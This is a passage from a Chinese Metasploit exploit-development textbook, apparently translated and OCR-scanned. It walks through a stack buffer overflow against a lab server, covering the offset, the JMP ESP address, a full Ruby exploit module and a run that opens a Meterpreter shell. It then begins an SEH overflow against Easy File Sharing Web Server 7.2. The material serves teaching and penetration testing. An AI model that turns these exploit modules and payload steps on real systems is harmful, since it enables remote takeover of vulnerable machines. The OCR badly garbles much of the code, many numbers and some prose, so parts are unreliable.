计算 出 的 结果 为 5220。 因 此 ， 在 520 字 节 后 面 的 4 字 节 就 会 填写 到 EIP 寄 存 器 中 。 


3.24 查找 JMP ESP 地 址 
再 来 回顾 一 下 渗透 过 程 的 图 示 。 


E | ESP 


Buffer ”EBP 


到 EIP 寄 存 器 的 偏 移 量 为 520 用 于 去 除 不 确定 因素 的 填充 数据 和 
攻击 载荷 


现在 已 经 成 功 完成 了 上 图 中 的 第 一 步 , 下 面 来 查找 JMPESP 的 地 址 。 我 们 之 所 以 需要 这 个 JMP 
ESP 指 令 的 地 址 ， 是 因为 我 们 通过 ESP 寄 存 器 来 载 人 攻击 载荷 ， 而 不 是 在 填充 满 缓 冲 区 之 后 简单 
地 找到 攻击 载荷 。 因 此 ， 需 要 从 一 个 外 部 的 DLL 文件 得 到 JMP ESP 指 令 的 地 址 ， 这 个 DLL 文件 将 
会 使 程序 跳 转 到 ESP 中 的 地 址 ， 而 这 正 是 攻击 载荷 的 起 始 地 址 。 


为 了 找到 这 个 跳 转 地 址 ,需要 一 个 调试 器 , 这 样 才 能 知道 这 个 有 漏洞 的 应 用 程序 载 人 了 哪些 
DLL 文件 。 我 认为 Immunity 调试 器 是 最 好 的 选择 ， 它 提供 了 各 种 用 于 编写 渗透 模块 的 插件 。 
1. 使 用 mmunity 调 试 器 查找 可 执行 模块 


immunity 调 试 器 是 一 种 应 用 程序 , 它 可 以 帮助 我 们 观察 一 个 程序 在 运行 时 的 各 种 行为 。 这 将 

有 助 于 查找 系统 的 漏洞 、 观 察 寄存 器 的 值 以 及 对 程序 实现 逆向 工程 ， 等 等 。 在 immunity 调 度 咒 中 

分 析 要 渗透 的 应 用 程序 , 不 仅 能 帮助 我 们 了 解 各 种 寄存 器 中 的 值 , 也 能 提供 目标 程序 的 各 种 相关 
言 息 ， 例 如 当 程 序 骨 演 时 的 表现 以 及 可 执行 模块 链接 生成 的 可 执行 文件 。 
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单 击 immunity 调 试 器 菜单 栏 中 的 FILE 选 项 , 然后 在 弹出 的 下 拉 菜 单 中 选择 Open, 这 样 就 可 以 
载 人 你 想 要 调试 的 可 执行 文件 。 另 外 也 可 以 通过 单 击 菜单 栏 上 的 FILE 选 项 , 然后 在 下 拉 荣 单 中 选 
择 Attach 选 项 ， 将 一 个 程序 的 进程 附加 到 immunity 调 试 器 中 。 接 下 来 查看 一 下 如 何 对 一 个 进程 实 
现 附加 操作 。 选 择 了 FILEIAttach 后 ， 就 可 以 看 到 2m 运行 的 全 部 进程 列表 。 你 需要 做 的 只 
是 选择 合适 的 进程 。 不 过 , 这 里 需要 特别 强调 一 点 : 当 一 个 进程 附加 到 了 immunity 调 试 器 上 之 后 ， 
默认 情况 下 , 它 会 处 于 暂停 状态 。 因 此 , 需要 按 RUN 进程 从 暂停 状态 转换 到 运行 状态 。 
来 看 一 下 如 何 将 一 个 进程 附加 到 immunity 调 试 圳 。 


Select process to attach 


PN NSystem3Z*svchost.exe 

:NProgram FilesNWdinSMTPServerNMWindows SMTP Server* 
:NProgram FilesNVMwareNVMware ToolsNVMUpsradeHelpe 
: NNINDOHSNExplorer.EXE 

: NHINDOHSNs ystem32Nwscntfy.exe 

:NProgram FilesNVMwareNVMware ToolsNVMwareTray.exe 
:NProsgram FilesNVMwareNVMware ToolsNVMwareUser.exe 
ocuments and SettingsNmm*DesktopNbof-server.exe 
:NAINDOHSNSystem3Zwsalsg.exe 

: NNINDOHSNs ystem32wwuauclt.exe 

: NHINDOHSNs ystem32Ns vchost.exe 

: NHINDOHSSNs ystem32Ncmd. exe 


svchost 
WinSMTPServer 
VMUpsradeHelper 


Explorer 
Oy 
VMwarelray 
VMwareUser 

Se bof-server 
alg 
wuauclt 
svchost 
cmd 


OOOOOOOQOOOC: 


~ 
Cancel 


按 下 Attach 按 钮 之 后 ， 首 先 单 击 View， 然后 再 选择 Executable Modules ， 这 样 就 可 以 看 到 当前 
这 个 有 漏洞 的 应 用 程序 都 载 人 了 哪些 DLL 文件 。 下 面 列 出 了 这 个 程序 所 使 用 的 DLL 文件 。 


E Executable modules 


C:\Documents and Settings*fldministrator*Desktop*bof-seruer.exe 
9 hnetcfg -1.26080.2188 © C:\WINDOWS\system32\hnetcfg-dl1 F] 
AAA &003FBB8 710514CD msusock .1.2688.21880 X C: NVINDOUSNsustem32Nnsusock. eu 
B8800 7109142E ushtcpip 5.1.2688.2188 € C: NUINDOUSNSustem32Nushtcpip.d 
B8AAA 716601642 WUS2HELP -2688.2188 CO C:NUINDOUSNs ustem32NUS2HELP - Fi 
7888 7180B1273 ps -1.2600.2188 C C:NVINDOUSNsustem32NUS2 32.DLL 
77C10000 88858888 ?77C1F2A1 msucrt .0.2608.21880 © C:NVINDOUSNs ystem32Nnsucrt .d11 
77D40000 888988088 77D5B8EB9 USER32 -1.2688.2188 € C:NINDOUSNs ustem32NUSER32 .d11 
77DD000A 9999BODB 77DD79D4 RDURPI32 5.1.2600.2188 C C:NUINDOUSNs ystem32N0 DUAPI32.d11 
-1.2600.2188 O C: NUINDOUSNs ystem32NRPCRT4.d11 
-1.2600.2188 © C: NUINDOUSSs ystem32NGDI32.d11l 
-2688.2188 CO C:NUINDOUSNs ystem32Nkerne132.d11 
-2600.2189 © C:NUINDOUSNs ystem32Nntdll.d1ll 


808918880 77E76284 M 
00046000 77F163Ch 

IBBF48BB 7C80B436 各 Rn2132 
898BBB88 7C913156 ntdll 


5 
5 
5 
5. 
5 
? 
5 
5 
5 
5 
5. 
5. 


现在 已 经 取得 了 DLL 文件 列表 ， 接 下 来 需要 在 它们 中 找到 JMP ESP 的 地 址 。 
2. msfbinscan 的 使 用 


在 前 一 节 中 , 我 们 已 经 找到 了 和 有 漏洞 应 用 程序 相关 联 的 DLL 模块 。 现 在 有 两 种 方案 ,一 是 
使 用 immunity 调 试 器 查找 JMP ESP 指 令 的 地 址 ， 这 是 一 个 漫长 又 耗 时 的 过 程 ; 或 者 使 用 
msfbinscan 在 一 个 DLL 文件 中 查找 JMP ESP 指 令 的 地 址 一 一 这 个 过 程 快 很 多 ， 而 且 也 省 去 了 大 
量 的 手动 操作 。 


在 命令 行 运行 nsfbinscan 的 帮助 命令 ， 可 以 得 到 下 面 的 输出 。 
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root@kali:/usr/share/metasploit-framework# msfbinscan -h 


Usage: 


Modes: 


7j, 


--jump [regA,regB,regC] 


[PE |ELF |MACHO] 


T-P, 


--poppopret 


[PE | ELF | MACHO] 


-r, 


--regex [regex] 


[PE | ELF | MACHO] 


-a, 


--analyze-address [address] 


[PE |ELF] 
-b, --analyze-offset [offset] 
[PE |ELF] 
-f, --fingerprint 
[PE] 
-i, --info 
e [PE] 
-R, --ripper [directory] 
[PE] 
--context-map [directory] 
[PE] 
Options: 
-A, --after [bytes] 


ion 


[PE | ELF | MACHO] 


-B, 


--before [bytes] 


[PE | ELF | MACHO] 


-I, --image-base [address] 

[PE | ELF | MACHO] 

-D, --disasm 

[PE|ELF] 

-F, --filter-addresses [regex] 
[PE] 

-h, --help 


/usr/bin/msfbinscan [mode] «options» [targets] 


Search for jump equivalent instructions 


Search for pop+pop+ret combinations 


Search for regex match 


Display the code at the specified address 
Display the code at the specified offset 
Attempt to identify the packer/compiler 
Display detailed information about the imag 


Rip all module resources to disk 


Generate context-map files 


Number of bytes to show after match (-a/-b) 


Number of bytes to show before match (-a/-b 


Specify an alternate ImageBase 


Disassemble the bytes at this address 


Filter addresses based on a regular express 


Show this message 


你 可 以 利用 msfbinscan 完 成 各 种 任务 , 例如 为 基于 SEH 的 栈 洲 + 
地 址 ， 或 者 显示 指定 地 址 的 代码 。 现在 只 需要 查找 JMPESP 指 
后 面 添加 寄存 器 名 字 来 实现 ， 


JMP ESP 的 地 址 。 


查找 POP-POP-RI 
令 的 地 址 ， 这 可 以 通过 在 参数 -j 的 
这 里 寄存 器 的 值 为 ESP。 下 面 在 ws2 32.dll 文 件 中 进行 查找 ,以 找到 


ET 指令 的 


root8ükali:-4 msfbinscan -j esp /root/Desktop/ws2 32.dll 
[/root/Desktop/ws2 32.dll] 

0x71ab9372 push esp; ret 
root8kali:-id [i 


这 
需 用 这 


3.2.5 


填充 空 
现在 来 回顾 一 下 


[8] 


这 个 渗透 图 ， 了 解 当 前 所 进行 


的 步 又 。 


个 命令 返回 的 结果 是 0x71ab9372， 这 是 在 ws2_ 32.dll 文 件 中 JMP ESP 指 令 的 地 址 。 然 后 只 
个 地 址 来 重 写 EIP 寄 存 器 中 的 内 容 ， 攻 击 载 荷 就 可 以 成 功 找到 并 执行 ShellCode。 
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Buffer = EBP EIP 
到 EIP 寄 存 器 的 偏 移 量 为 520 用 于 去 除 不 确定 因素 的 填充 数据 和 
攻击 载荷 


现在 已 经 成 功 完成 了 第 二 个 步骤 。 不 过 这 里 必须 指出 一 点 ，ShellCode 有 时 可 能 不 在 ESP 所 指 
向 的 内 存 地 址 。 在 这 种 情况 下 ， 往 往 在 EIP 和 ESP 之 间 会 隔 着 一 段 区 域 ， 而 我 们 需要 使 用 随机 数 
据 或 者 NOP 来 填充 这 个 区 域 。 
假设 我 们 将 ABcDEF 发 送 到 ESP。 当 使 用 immunity 调 试 器 对 其 进行 分 析 时 ， 得 到 的 内 容 只 有 
DEF。 在 这 个 示例 中 ,我 们 丢失 了 3 个 字符 。 因 此 ， 我们 将 使 用 3 个 NOP 或 者 其 他 随机 数据 来 填充 
Beh ERT 


现在 来 看 看 在 有 漏洞 的 应 用 程序 中 进行 数据 填充 是 不 是 必需 的 。 


root@kali:-# perl -e 'print "A" x 520 . "\x72\x93\xab\x71". "ABCDEF"' > 
jnx.txt 

rootükali:-£ telnet 192.168.10.104 200 < jnx.txt 

Trying 192.168.10.104... 

Connected to 192.168.10.104. 

Escape character is '^]' 


> Connection closed by foreign host. 

在 上 图 中 , 我 们 基于 缓冲 区 的 大 小 创建 了 数据 。 我 们 事前 已 经 知道 侦 移 量 是 520， 因 此 在 520 
后 面 以 小 端 模式 给 出 JMP ESP 指 令 的 地 址 ， 青 然后 给 出 一 串 随 机 的 字符 ， 即 “ABCDEF”。 在 发 
送 生 成 的 随机 字符 之 后 ， 使 用 immunity 调 试 器 对 ESP 寄 存 器 中 的 内 容 进行 分 析 ， 结 果 如 下 。 


FFFFFFFF 
ECX 88882737 
EDX 8BBBBBBS 
EBX 8BBBBBBBD 
ESP 8822FD71 ASCII "BCDEF" 
EBP 41414142 
ESI 81D19Bif 
EDI 3D82C758 


EIP 8822FD76 


可 以 看 到 ， 这 个 随机 的 字符 串 “ABCDEF” 中 的 字符 A 已 经 丢失 。 因 此 ， 只 需要 填充 一 个 字 
节 就 可 以 实现 对 齐 操作 ,使 用 少量 额外 的 NOP 来 填充 ShellCode 前 面 的 空间 是 避免 问题 产生 的 最 佳 
实践 。 
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NOP 的 实用 性 


NOP 和 NOP-sled 指 的 是 不 进行 任何 操作 的 指令 。 它 的 任务 仅仅 是 使 程序 在 没有 完成 任何 操作 
的 状态 下 执行 到 下 一 个 内 存 地 址 。 使 用 NOP 可 以 达到 内 存 中 ShellCode 的 存放 地 址 。 因 此 可 以 在 
ShellCode 前 添加 大 量 的 NOP, 这 样 就 消除 了 内 存 地 址 的 不 确定 性 。 这 些 指令 不 进行 任何 操作 , 仅 
仅 是 顺序 地 执行 到 下 一 个 地 址 。 空 指令 使 用 16 进 制 的 表示 形式 ， 就 是 \x90。 


3.2.6 ”确定 坏 字符 


有 时 即便 所 有 渗透 工作 都 已 正确 完成 , 却 不 能 成 功 渗透 到 目标 系统 中 ,或 者 渗透 工作 完成 了 ， 
但 是 攻击 载荷 却 没有 执行 。 当 渗透 模块 中 提供 的 数据 被 目标 系统 进行 了 截断 或 者 不 当 解 析 时 ,就 
会 出 现 以 上 现象 。 这 将 导致 整个 渗透 模块 不 能 工作 ， 我 们 也 将 无 法 获得 控制 系统 的 shel! 或 者 
Meterpreter。 在 这 种 情况 下 ， 需 要 找到 那些 导致 不 能 运行 的 坏 字 符 。 处 理 这 种 情况 的 最 好 办 法 就 
是 找到 匹配 的 渗透 模块 ， 将 坏 字 符 从 渗透 模块 中 移 除 。 


需要 在 渗透 模块 的 Payloaq 段 中 定义 这 些 坏 字 符 ， 看 看 下 面 这 个 例子 。 


'Payload' a 
{ 
'Space' -» 800, 
'BadChars' -» "Wx00Nx20Nx0aNxOd", 
'StackAdjustment' => -3500, 
Fa 


这 段 代码 位 于 /exploit/windows/ftp 目 录 下 的 freeftpd_user.rb 文 件 中 。 


有 关 确 定 坏 字符 的 更 多 信息 ， 请 访问 : http://resources.infosecinstitute.com/stack- 
based-buffer-overflow-in-win-32-platform-part-6-dealing-with-characters-jmp-instruction/。 


3.2.7 ”确定 空间 限制 


攻击 载荷 中 的 变量 空间 确定 了 用 于 载 入 ShellCode 的 空间 大 小 ,我 们 需要 为 载 人 的 攻击 载荷 中 
的 ShellCode 安 排 足够 的 空间 。 如 果 攻 击 载荷 很 大 ， 但 是 分 配 的 空间 却 小 于 ShellCcode ， 它 将 无 法 
执行 。 另 外 ， 当 编写 自 定 义 模块 时 ，ShellCode 越 小 越 好 。 我 们 可 能 会 遇 到 这 样 一 种 情况 ， 一 个 可 
用 的 ShellCode 需 要 至 少 800 字 节 , 但 是 可 用 空间 只 有 200 字 节 。 这 种 情况 下 , 可 以 先 在 缓冲 区 中 载 
人 第 一 个 较 小 的 ShellCode ， 然 后 再 下 载 和 执行 第 二 个 较 大 的 ShellCode， 这 样 就 可 以 完成 整个 渗 


65 从 以 下 网 址 可 获得 各 种 攻击 载荷 模块 中 较 小 的 ShellCode: http://www.shell- 


storm.org/shellcode/。 
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3.2.8 编写 Metasploit 的 渗透 模块 
来 回顾 一 下 开发 过 程 图 ， 并 检查 是 否 已 经 完成 了 模块 。 


Buffer EBP EIP 


与 EIP 才 存 器 之 间 的 偏 移 量 为 520 


到 现在 为 止 ， 我 们 已 经 掌握 了 开发 Metasploit 模 块 所 需 的 所 有 内 容 。 因 为 在 Metasploit 中 ， 攻 
击 载荷 是 自动 生成 的 ， 而 且 也 可 以 动态 地 进行 修改 。 好 了 ， 现 在 就 开始 吧 : 


require 'msf/core' 


class Metasploit3 « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::Tcp 


def initialize(info - ()) 
super (update info(info, 
'Name' => 'Stack Based Buffer Overflow Example', 
'Description' => %q{ 
Stack Based Overflow Example Application Exploitation Module 
hs 
'Platform' => 'win', 
'Author' z» 
[ 
'Nipun Jaswal' 
l5 
'Payload' => 
{ 
'space' => 1000, 
'BadChars' => "AxOOWxffÉ", 
bs 
'Targets' => 


['Windows XP SP2',( 'Ret' => 0x71AB9372, 'Offset' => 


'DisclosureDate' -» 'Apr 19 2016' 
) ) 
register options( 
[ 
Opt : : RPORT (200) 
],self.class) 
end 
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渗透 攻击 模块 的 开发 过 程 


在 开始 运行 这 段 代 码 之 前 ， 先 来 看 看 这 段 代码 中 使 用 的 库 文 件 。 


引入 语句 


路 径 Hox 


Msf::Exploit::Remote: 


‘Top 


/lib/msf/core/exploit/tcp.rb 


TCP 库 文件 提供 了 基础 的 TCP 函 
如 连接 、 断 开 、 写 数据 等 


数 ， 例 


我 们 按照 和 第 2 音 完 全 一 书 


的 方式 来 构建 模块 。 从 包含 必要 的 库 路 径 ， 再 从 这 些 路 径 引 入 必 


需 的 文件 开始 构建 模块 。 将 模块 的 类 型 定义 为 Msf : 
模块 。 接 下 来 初始 化 构造 函数 ， 在 其 中 定义 名 字 、 描 述 、 
方法 里 有 一 些 新 的 声明 ， 下 图 给 出 


- 


: Exploit: 


: Remote, 这 表示 一 个 远程 渗透 
作者 信 ， 息 等 内 容 。 然而 ， 在 这 文 些 初 始 化 


了 这 些 声明 的 详细 信息 。 


声 明 值 用 途 
platform win 定义 了 渗透 模块 所 适用 的 目标 平台 ， 值 设 为 win 表示 该 渗透 模 
块 可 以 应 用 在 Windows 类 型 的 操作 系统 上 
disclosureDate Apr 19 2016 披露 漏洞 的 时 间 
targets Ret: 0x71AB9372 Ret 字 段 给 出 特定 操作 系统 中 JMP ESP 的 地 址 ， 这 个 地 址 的 值 
在 上 一 节 中 已 经 找到 
targets Offset: 520 偏 移 量 字段 给 出 了 在 特定 操作 系统 中 填充 EIP 之 前 的 缓冲 区 所 
需要 的 字 节 数量 ， 在 上 一 节 中 已 经 找到 了 这 个 值 
payload Space: 1000 攻击 载荷 中 的 变量 space 定 义 了 可 以 使 用 的 最 大 空间 。 这 一 点 
十 分 重要 , 因为 有 时 候 需 要 在 非常 有 限 的 空间 中 加 载 ShellCode 
payload BadChars: \x00\xff 攻击 载荷 中 的 变量 Badqchars 定 义 了 在 产生 攻击 载荷 时 要 避免 
的 坏 字 符 。 对 坏 字符 的 声明 可 以 保证 稳定 性 ， 而 且 便 于 删除 这 
些 容 易 引 起 应 用 程序 崩溃 或 者 攻击 载荷 失效 的 坏 字符 
我 们 在 register_options 字 段 定 义 了 渗透 模块 的 端口 为 200。 下 面 是 剩余 的 代码 : 
def exploit 
connect 
buf - make nops(target['Offset']) 
buf = buf + [target['Ret']].pack('V') + make nops(10) + payvload.encoded 
Sock.put (buf) 
handler 
disconnect 
end 
end 
下 面 来 了 解 一 些 上 述 代码 中 的 重要 函数 。 
ES S E x 件 A R 
make_nops /lib/msf/core/exploit.rb 通过 传递 过 来 的 参数 n 的 值 创 建 相 同 数 量 的 NOP 
connect /lib/msf/core/exploit/tcp.rb 建立 与 目标 的 连接 
disconnect /lib/msf/core/exploit/tcp.rb 切断 与 目标 已 建立 的 连接 
handler /lib/msf/core/exploit.rb 将 连接 传递 给 相关 的 攻 击 载荷 handler， 以 检查 渗 


透 模块 是 否 成 功 执行 、 
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在 上 一 广 中 我 们 已 经 了 解 到 ， 陶 数 run 是 作为 辅助 模块 的 默认 函数 被 使 用 的 。 不 过 对 于 渗透 
模块 来 说 ，exploit 才 是 默认 的 主 函 数 。 


首先 使 用 connect 函 数 连 接 目标 , 然后 使 用 make_nops 函 数 生 成 320 个 NOP( 520 这 个 数值 由 
初始 化 部 分 Farget 声 明 中 的 offset 字 段 决定 )。 将 这 $20 个 NOP 保 存 到 buf 变 量 中 。 在 接 下 来 的 
一 条 指令 中 ， 将 JMP ESP 的 地 址 保存 到 buf (这 个 地 址 的 值 由 初始 化 部 分 arget 声 明 中 Ret 字 段 
决定 ) 中 ,使 用 pack('vV') 就 可 以 将 这 个 地 址 转换 为 小 端 模式 。 紧 接着 向 Ret 地 址 中 添加 少量 NOP 
作为 ShellCode 的 填充 。 使 用 Metasploit 的 优势 之 一 就 是 可 以 动态 地 切换 攻击 载荷 , 使 用 payload. 
encodedq 可 以 将 选中 的 攻击 载荷 添加 到 buf 变 量 中 。 


接 下 来 ， 使 用 sock.put 国 数 将 buf 的 值 发 送 到 已 连接 的 目标 上 。 然 后 运行 handler 方 法 检查 
目标 是 否 已 经 被 成 功 闯 透 ， 以 及 是 否 成 功 建立 了 一 个 连接 。 最 后 ， 使 用 aisconnect 断 开 和 目标 
的 连接 。 下 面 来 看 看 是 否 成 功 地 渗透 了 这 个 服务 。 


msf > use exploit/windows/masteringmetasploit/example200-1 

msf exploit(example2088-1) > set payload windows/meterpreter/bind tcp 
payload -» windows/meterpreter/bind tcp 

msf exploit(example288-1) » show options 


Module options (exploit/windows/masteringmetasploit/example200-1): 
Name Current Setting Required Description 


RHOST 192.168.10.104 yes The target address 
RPORT 200 yes The target port 


Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Required Description 

EXITFUNC Pn d yes Exit technique (Accepted: '', seh, thread, process, none) 
LPORT 4444 yes The listen port 

RHOST 192.168.10.104 no The target address 


dni target: 
Id Name 


0 Windows XP SP2 


msf exploit(example200-1) > exploitlj 


我 们 设 定 好 了 所 需 的 选项 ， 并 将 攻击 载荷 设置 为 windows/meterpreterbind tcp 
载荷 表示 和 目标 直接 连接 。 接 下 来 看 看 当 输入 sxploit 命 令 之 后 发 生 了 什么 。 


这 个 攻击 


msf exploit(example288-1) > exploit 


*] Started bind handler 
*] Sending stage (957487 bytes) to 192.168.10.104 
*] 


Meterpreter session 1 opened (192.168.10.118:36771 -> 192.168.10.104:4444) at 2016-04-14 09:28:1 
-0400 
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好 了 ,我 们 轻松 地 获得 了 目标 计算 机 上 的 Meterpreter 权 限 。 现 在 我 们 已 经 成 功 地 完成 了 第 一 
个 渗透 模块 ， 接 下 来 去 学 习 一 个 更 为 高 级 的 渗透 模块 开发 示例 。 


3.3 ”使 用 Metasploit 实现 基于 SEH 的 缓冲 区 溢出 


异常 处 理 程序 ( exception handler ) 是 用 来 捕获 在 程序 执行 期 间 生 成 的 异常 和 错误 的 代码 模块 ， 
这 种 机 制 可 以 保证 程序 继续 执行 而 不 崩 演 。Windows 操 作 系 统 中 也 有 默认 的 异常 处 理 程序 ， 在 一 
个 应 用 程序 崩溃 的 时 候 , 我 们 一 般 会 看 到 系统 弹出 一 个 “XYZ 程序 遇 到 错误 , 需要 关闭 ”的 窗口 。 
当 程序 产生 了 蜡 常 之 后 ， 就 会 从 栈 中 加 载 catch 代 码 的 地 址 并 调用 catch 代 码 。 因 此 ， 如 果 以 某 种 
方式 设法 覆盖 了 栈 中 异常 处 理 程序 的 catch 代 码 地 址 , 我 们 就 能 够 控制 这 个 应 用 程序 。 接 着 来 看 一 
个 使 用 了 异常 处 理 程序 的 应 用 程序 在 栈 中 是 如 何 安排 其 内 容 的 。 


0x00000000 0x00000000 


存储 变量 的 空间 


保存 的 EBP 


OxFFFFFFFF OxFFFFFFFF 


由 上 图 可 知 ， 栈 中 包含 了 catch 块 的 地 址 。 还 可 知 ， 只 要 向 程序 提供 足够 多 的 数据 ， 就 可 改写 
栈 中 catch 块 的 地 址 。 因 此 ， 可 以 使 用 Metasploit 中 的 pattern_create 和 pattern_offset 两 个 
工具 来 找到 这 个 用 于 改写 catch 块 地 址 的 偏 移 量 。 下 面 给 出 了 一 个 示例 。 
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root@kali:/usr/share/metasploit-framework/tools/exploit# ./pa 
ttern create.rb 4000 > 4000.txt 


我 们 创建 了 一 个 4000 个 字符 的 字符 序列 ， 并 使 用 TELNET 命 令 将 它们 发 送 到 目标 ， 然 后 在 
immunity 调 试 器 中 查看 这 个 应 用 程序 的 栈 。 


I 


45306E45 EnBE 
6E45316E niEn 
336E4532 2En3 Pointer to next SEH record 
4E SE handler 
6E45356E n5En 
376E4536 6En? 
可 以 看 到 ， 这 个 应 用 程序 的 栈 中 SE handler 的 地 址 已 经 被 改写 为 45346E45。 接 着 使 用 
pattern_offset 查 找 精确 的 偏 移 量 ， 过 程 如 下 图 所 示 。 


root@kali:/usr/share/metasploit-framework/tools# ./pattern offset.rb 45346E45 10 
000 
[*] Exact match at offset 3522 


精确 的 匹配 值 为 3522。 不 过 这 里 必须 要 指出 一 点 , 根据 SEH 框 架 的 结构 , 可 以 看 到 如 下 图 所 
示 的 部 分 : 


0x00000000 


下 一 条 SEH 记 录 的 地 址 


catch 块 地 址 处 理 程序 的 地 址 


下 一 条 SEH 记 录 的 地 址 


catch 块 地 址 处 理 程序 的 地 址 


下 一 条 SEH 记 录 的 地 址 


catch 块 地 址 处 理 程序 的 地 址 


OxFFFFFFFF 
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根据 上 图 ,一 个 SEH 记 录 中 的 前 4 个 字 节 是 它 后 面 的 SEH 异 常 处 理 程序 的 地 址 ， 后 4 个 字 节 是 


catch 块 的 地 址 。 一 个 应 用 程序 可 能 有 多 个 异常 处 理 程序 ， 因 此 一 个 SEH 记 录 将 前 4 个 字 节 用 来 保 
存 下 一 条 SEH 记 录 的 地 址 。 下 面 来 看 看 如 何 能 更 好 地 利用 SEH 记 录 。 


(1) 引起 应 用 程序 的 异常 ， 这 样 才 可 以 调用 异常 处 理 程序 。 


(2) 使 用 一 条 POP/POP/RETN 指 令 的 地 址 来 改写 异常 处 理 程序 的 地 址 ， 因 为 我 们 需要 将 执行 
切换 到 下 一 条 SEH 记 录 的 地 址 (catch 异常 处 理 程序 地 址 前 面 的 4 个 字 节 )。 之 所 以 使 用 
POP/POP/RET， 是 因为 用 来 调用 catch 块 的 内 存 地 址 保存 在 栈 中 ， 指 向 下 一 个 异常 处 理 程序 指针 
的 地 址 就 是 ESP+8 ( ESP 是 栈 项 指针 )。 因 此 ， 两 个 POP 操作 就 可 以 将 执行 重 定向 到 下 一 条 SEH 记 
录 的 地 址 。 


(3) 在 第 一 步 输 入 数据 的 时 候 , 我 们 已 经 将 到 下 一 条 SEH 记 录 的 地 址 蔡 换 成 了 跳 转 到 攻击 载荷 
的 JMP 指 令 的 地 址 。 因 此 ， 当 第 二 个 步骤 结束 时 ,程序 就 会 跳 过 指定 数量 的 字 节 去 执行 ShellCode。 


(4) 当成 功 跳 转 到 Shellcode 之 后 ， 攻 击 载荷 就 会 执行 ， 我 们 也 获得 了 目标 系统 的 管理 权限 。 
下 图 可 以 帮助 我 们 更 好 地 了 解 这 个 过 程 。 


4. 下 一 跳 SEH 记 录 的 地 址 中 
aa TREBERN 
1 .异常 发 生 短 跳 转 指 令 
调用 catch 块 下 一 条 SEH 记 录 的 地 址 ShellCode 
handler 的 地 址 


2.handler 的 地 址 被 改写 为 
POP/POP/RET 的 地 址 


3.POP/POP/RET 的 操作 
可 以 将 执行 重 定 向 到 
下 一 跳 SEH 记 录 的 地 址 


BG EOD AES 


如 上 图 所 示 ， 当 一 个 异常 发 生 时 ， 异 常 处 理 程序 的 地 址 (已 经 使 用 poP/POP/RET 指 令 的 地 
址 改写 过 ) 就 会 被 调用 。 这 会 导致 POP/POP/RET 的 执行 , 并 将 执行 的 流程 重新 定向 到 下 一 条 SEH 
记录 的 地 址 (已 经 使 用 一 个 短 跳 转 指 令 改 写 过 ), 因 此 当 JMP 指 令 执 行 的 时 候 , 它 会 指向 ShellCode; 
而 在 应 用 程序 看 来 ， 这 个 ShellCode 只 是 另 一 条 SEH 记 录 。 


3.3.1 构建 渗透 模块 的 基础 
现在 我 们 已 经 熟悉 了 基本 知识 ， 接 下 来 看 看 建立 一 个 基于 SEH 的 渗透 模块 的 要 点 。 
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组 — dt Hx 
offset 在 这 个 模块 中 ，offset 指 的 是 用 来 改写 catch 块 地 址 的 输入 字符 的 精确 数量 


POP/POP/RET 地 址 ”为 了 将 执行 重 定向 到 短 跳 转 指令 ， 需 要 一 个 POP/POP/VRET 指 令 序 列 的 地 址 。 不 过 现在 最 先进 的 
操作 系统 使 用 了 SafeSEH 机 制 来 进行 DLL 编译 。 这 条 指令 适用 于 处 理 没 有 SafeSEH 保 护 的 DLL 
短 跳 转 指 令 为 了 能 跳 转 到 ShellCcode 的 开始 处 ， 需 要 跳 过 指定 数量 的 字 节 ， 因 此 就 需要 一 条 短 跳 转 指令 


我 们 现在 需要 一 个 攻击 载荷 ， 并 对 其 进行 消除 坏 字符 、 确 定 空间 限制 等 操作 。 


3.8.20 ”计算 偏 移 量 


我 们 现在 要 处 理 的 这 个 有 漏洞 的 应 用 程序 是 简单 文件 分 享 Web 服 务 器 7.2 (Easy File Sharing 
Web Server 7.2 )， 这 个 Web 应 用 程序 在 处 理 请 求 时 存在 漏洞 个 恶意 的 请 求 尖 部 就 可 以 引起 
缓冲 区 洪 出 ， 从 而 改写 SEH 链 的 地 址 。 


1. 使 用 pattern create 工 具 


我 们 可 以 像 之 前 一 样 将 这 个 有 漏洞 的 程序 附加 在 调试 器 上 ， 然 后 使 用 pattern_create 和 
pattern_offset 这 两 个 工具 来 计算 偏 移 量 。 下 面 给 出 了 具体 过 程 。 


root@predator:/usr/share/metasploit-framework/tools/exploit# ./pattern create.rb 
10000 > easy file 


首先 创建 一 个 10 000 个 字符 的 序列 ,然后 将 这 个 序列 发 送 到 目标 程序 的 80 端 口 ,并 在 immunity 
调试 器 中 分 析 这 个 程序 的 行为 。 我 们 将 会 看 到 这 个 程序 停止 了 。 然 后 点 击 菜单 栏 上 的 View 选 项 ， 
在 弹出 的 下 拉 菜 单 中 选中 SEH chain 来 查看 SEH 链 。 


Immunity Debugger - fsws.exe - [SEH chain of threat: 


图 File Debug Plugins Immlib Option 


Log Alt«L 
Executable modules Alt+E 
Memory Alt-M 
Heap 

Threads 

Windows 

Handles 

CPU Alt«C 
SEH chain Alt+S 
Patches Ctri+P 
Call stack Alt+K 
Breakpoints Alt+B 


Hardware Breakpoints 
Watches 

References 

Run trace 

Source 

Source files 

File 

Text file 
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单 击 SEH chain 选 项 就 可 以 看 到 被 我 们 提供 的 数据 所 修改 的 catch 块 和 下 一 条 SEH 记 录 的 
地 址 。 


Address |SE handler | 


902226FRC 46356646 
34664633 xxx CORRUPT ENTRY xxx 


2. 使 用 pattern_offset 工 具 


接着 来 到 下 一 条 SEH 记 录 地 址 的 偏 移 量 以 及 到 catch 块 地 址 的 偏 移 量 ， 过 程 如 下 图 所 示 。 


root@predator:/usr/share/metasploit-framework/tools/exploit# ./pattern offset.rb 
46356646 10000 

[*] Exact match at offset 4065 
rootüpredator:/usr/share/metasploit-framework/tools/exploit& ./pattern offset.rb 
34664633 10000 

[*] Exact match at offset 4061 


可 以 清楚 地 看 到 ， 下 一 条 SEH 记 录 的 起 始 地 址 在 4061 字 节 人 处 ， 而 catch 块 的 偏 移 量 在 它 后 面 4 
个 字 节 ， 也 就 是 4065 字 节 处 。 


3.3.3 查找 POP/POP/RET 地 址 


正如 之 前 所 讨论 过 的 , 我 们 需要 POP/POP/RET 指 令 的 地 址 来 载 人 下 一 条 SEH 记 录 的 地 址 , 并 
跳 转 到 攻击 载荷 。 这 需要 从 一 个 外 部 的 DLL 文件 载 入 一 个 地 址 , 不 过 现在 大 多 数 最 先进 的 操作 系 
统 都 使 用 SafeSEH 保 护 机 制 来 编译 DLL ， 因 此 我 们 需要 一 个 没有 被 SafeSEH 保 护 的 DLL 模块 的 
POP/POP/RET 指 令 地 址 。 

